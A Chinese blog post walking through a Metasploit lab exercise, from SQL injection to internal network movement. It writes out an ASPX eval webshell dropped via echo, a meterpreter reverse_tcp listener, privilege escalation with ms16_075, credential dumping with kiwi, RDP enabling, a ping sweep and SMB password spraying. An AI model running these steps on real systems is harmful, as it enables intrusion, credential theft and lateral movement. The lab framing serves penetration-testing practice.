• Metasploit靶场练习


    1.获取sql注入,通过sql注入,--is-dba发现为sa权限

    2.获取os-shell,使用echo向网站写入webshell(需要知道网站绝对路径)

    * 可先在本地测试命令是否可以正常执行,然后在将命令使用在实际环境中

    echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > C:\vip888\web\Admin\123.aspx
    

    成功写入webshell

    3.使用蚁剑连接(pass)

    4.上传msf远控木马

    5.msf开启监听 (0.0.0.0表示监听所有能监听到的host)

    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lport <ip>
    set lhost <host>
    

    6.在虚拟终端中运行上传的文件,msf端接收到传来的描meterpreter会话

    7.查看权限为iis权限,使用msf提权

    将会话切换到后台运行 查看给出的session,并给出当前会话id

    background
    

    选择local_exploit_suggester本地提权辅助模块,将上一步的会话id放入并运行,查看可使用的提权模块

    use post/multi/recon/local_exploit_suggester
    set session 4
    run
    

    选择可能存在漏洞的模块进行提权(可能会存在一定的误报),option查看需要填写的参数,填入刚刚的sessionid,在payload中选择反弹的ip,执行run,服务器收到新的meterperter会话

    use exploit/windows/local/ms16_075_reflection_juicy
    options
    

    set session <sessionid>
    set lhost <host>
    set lport <port>
    run
    

    漏洞利用成功,getuid查看权限为system权限

    getuid
    

    8.进程迁移

    ​ getpid查看当前进程,ps查看全部进程,使用migrate <进程号>迁移进程,最后getpid查看进程是否迁移成功(这里的进程迁移选择最好选择一个system权限开启的系统进程,选项尽量为svchost.exe进程和lsass.exe)

    getpid
    ps
    migrate <pid>
    getpid
    

    ​ 进程迁移完成,getpid查看进程为448

    9.读取Windows密码

    ​ 加载kiwi读取windows密码(旧版msf是load mimikatz)

    load kiwi
    creds_all
    

    ​ *这里我发现mimikatz已经换成了kiwi,并且meterpreter下命令也已经更换,这里我找了新的命令供大家参考https://www.cnblogs.com/KHZ521/p/14476955.html

    10.开启远程桌面

    (这里的情况只适合在内网中使用,因为在公网一般来说都会有规则的准入,即使开启了3389端口,也无法直接进行远程连接,不过可通过代理或流量转发的方式将流量代理到本地进行远程连接)

    run post/windows/manage/enable_rdp 
    

    11.在本地使用Windows就可以连接了

    Windows键+r打开运行,输入mstsc打开远程连接

    输入ip以及刚刚获得的账号和密码,远程连接即可

    连接成功

    内网探测

    ping探测内网可连通并存活主机(这里我192.168.233.137主机开启了防火墙,ping探测失败了)

    for /l  %i  in (1,1,255) do @  ping  192.168.233.%i  -w 1 -n  1 |  find  /i  "ttl="
    

    get_local_subnets查看当前网段

    run get_local_subnets
    

    autoroute将路由添加到本地

    run autoroute -s 192.168.233.0/24
    

    (run post/multi/manage/autoroute)可自动添加路由到本地,上面两步已被此方法代替

    批量探测开放的3389端口,发现192.168.233.137开放了3389端口

    use scanner/rdp/rdp_scanner
    set rhosts 192.168.233.0/24
    run
    

    使用获得的口令撞库(rhosts可以是多个IP地址)

    use     auxiliary/scanner/smb/smb_login
    set     RHOSTS    192.168.233.1/24
    set     SMBUser   administrator
    set     SMBPass   Admin123..
    run
    

  • 相关阅读:
    拖拽文件上传demo
    JS权限树数据处理demo
    某面试题 a==1&&a==2&&a==3 的解决方案以及涉及知识
    解决forEach函数中异步调用及Promise.all()的基础使用
    基于element ui的el-date-picker 日、周、月粒度切换时间选择器
    基于element ui的el-table-column行内编辑input/select封装
    JavaScript优化技术
    vue-canvas-poster生成海报 jsZip打包称压缩包
    uniapp中使用uView时 TypeError: Cannot read property ‘mark‘ of undefined
    JS中深拷贝数组、对象、对象数组方法
  • 原文地址:https://www.cnblogs.com/KHZ521/p/14665454.html
Copyright © 2020-2023  润新知